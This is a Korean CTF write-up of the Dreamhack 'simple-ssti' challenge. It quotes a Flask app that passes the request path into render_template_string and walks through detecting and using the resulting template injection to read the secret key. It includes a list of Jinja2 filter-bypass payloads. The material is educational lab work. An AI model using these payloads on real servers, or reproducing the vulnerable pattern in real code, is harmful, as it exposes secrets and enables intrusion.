[Dreamhack] Level1: simple-ssti

🛎️ Access

존재하지 않는 페이지 방문시 404 에러를 출력하는 서비스입니다.
SSTI 취약점을 이용해 플래그를 획득하세요. 플래그는 flag.txt, FLAG 변수에 있습니다.

 

 

👾 Exploit Algorithm & Payload

> app.py

#!/usr/bin/python3
from flask import Flask, request, render_template, render_template_string, make_response, redirect, url_for
import socket

app = Flask(__name__)

try:
    FLAG = open('./flag.txt', 'r').read()
except:
    FLAG = '[**FLAG**]'

app.secret_key = FLAG


@app.route('/')
def index():
    return render_template('index.html')

@app.errorhandler(404)
def Error404(e):
    template = '''
    <div class="center">
        <h1>Page Not Found.</h1>
        <h3>%s</h3>
    </div>
''' % (request.path)
    return render_template_string(template), 404

app.run(host='0.0.0.0', port=8000)

 

#1

---

: 1번과 2번 페이지 모두 status code 404(존재하지 않는 페이지)임이 확인됐다.

 

 

 

#2

---

# (생략)

@app.errorhandler(404)
def Error404(e):
    template = '''
    <div class="center">
        <h1>Page Not Found.</h1>
        <h3>%s</h3>
    </div>
''' % (request.path)
    return render_template_string(template), 404
    
# (생략)

: Flask Code를 살피면 웹 템플릿 구조를 확인할 수 있다. 

 

- 웹 템플릿이란?

웹 템플릿 엔진은 웹 템플릿과 웹 컨텐츠 정보를 처리하는 목적으로 설계된 소프트웨어

웹 서버를 구축할 때 코드에 보이는 {{content}}, {%content%} 이러한 형식으로 되어있는 대부분이 템플릿 엔진을 사용하기 위해 작성된 템플릿 구문

→ SSTI (Server Side Template Injection) 취약점은 공격자가 서버측의 기본 템플릿 구문을 이용하여 악성 페이로드를 삽입한 다음 서버 측에 실행되면서 생기는 취약점. (웹 템플릿 엔진마다 사용되는 페이로드 다를 수 있음)
→ 만약 사용자가 입력한 값이 템플릿 구문으로 인식하게 할 수 있다면 해당 템플릿 구문을 이용하여  SSTI 취약점을 발생시켜 RCE(Remote Code Execure) 취약점으로 연계될 수 있음

 

 

#3

---

: {{9*9}} 를 html에 삽입하여 템플릿 구문으로 인식하게 만들면 81이라는 결과가 출력되는 것을 알 수 있다.

 

 

🔑Analysis and results for obtaining the Flag DH{…}

---

: 기본적으로 Flask의 경우 app.n에 들어가는 대부분의 정보들이 config 클래스에 들어가게 되는데 만약 app.secret_key에 중요한 정보를 넣었을 때 {{config}} 해당 페이로드를 삽입하여 config 정보를 출력하게 만들면 app.secret_key에 들어간 중요 정보들이 나오게 된다.

: 이외에도 Flask Jinja2의 Templte Injection Bypass가 가능하다.

 

- config 필터링의 경우-

{{self.__dict__ }}
{{self['__dict__']}}
{{self|attr("__dict__") }}
{{self|attr("con"+"fig")}}
{{self.__getitem__('con'+'fig') }}
{{request.__dict__ }}
{{request['__dict__']}}
{{request.__getitem__('con'+'fig') }}

 

 

📌Summary

---

 SSTI의 경우 Python 언어에서만 동작되는 것이 아닌 템플릿을 사용하는 모든 언어에서 특정 문자 및 단어를 필터링하지 않게 되면 취약점이 발생될 수 있음

 

 더 나아가 추가 공격 RCE 취약점(SQL Injection, 역직렬화 공격, 임의 코드 실행, ...)이 추가로 발생할 수 있으므로 주의해야함